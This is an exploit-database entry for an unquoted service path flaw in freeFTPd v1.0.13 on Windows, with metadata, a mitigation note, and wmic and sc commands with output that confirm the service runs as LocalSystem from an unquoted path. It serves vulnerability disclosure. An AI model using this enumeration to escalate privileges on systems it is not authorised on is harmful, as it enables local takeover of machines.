header-logo
Suggest Exploit
vendor:
freeFTPd
by:
boku
7.2
CVSS
HIGH
Unquoted Service Path
73
CWE
Product Name: freeFTPd
Affected Version From: 1.0.13
Affected Version To: 1.0.13
Patch Exists: NO
Related CWE: N/A
CPE: a:freesshd:freeftpd
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 (32-bit)
2020

freeFTPd v1.0.13 – ‘freeFTPdService’ Unquoted Service Path

A vulnerability exists in freeFTPd v1.0.13 where the 'freeFTPdService' service is installed with an unquoted service path. This can be exploited by a local attacker to gain elevated privileges on the system.

Mitigation:

Ensure that all services are installed with a fully qualified path name and that the path is properly quoted.
Source

Exploit-DB raw data:

Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com
Software Link: http://www.freesshd.com/freeFTPd.exe
Version: 1.0.13
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """
freeFTPdService                           C:\Program Files\freeSSHd\freeFTPdService.exe                                      Auto

C:\Users\nightelf>sc qc freeFTPdService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: freeFTPdService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\freeFTPdService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : freeFTPdService
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem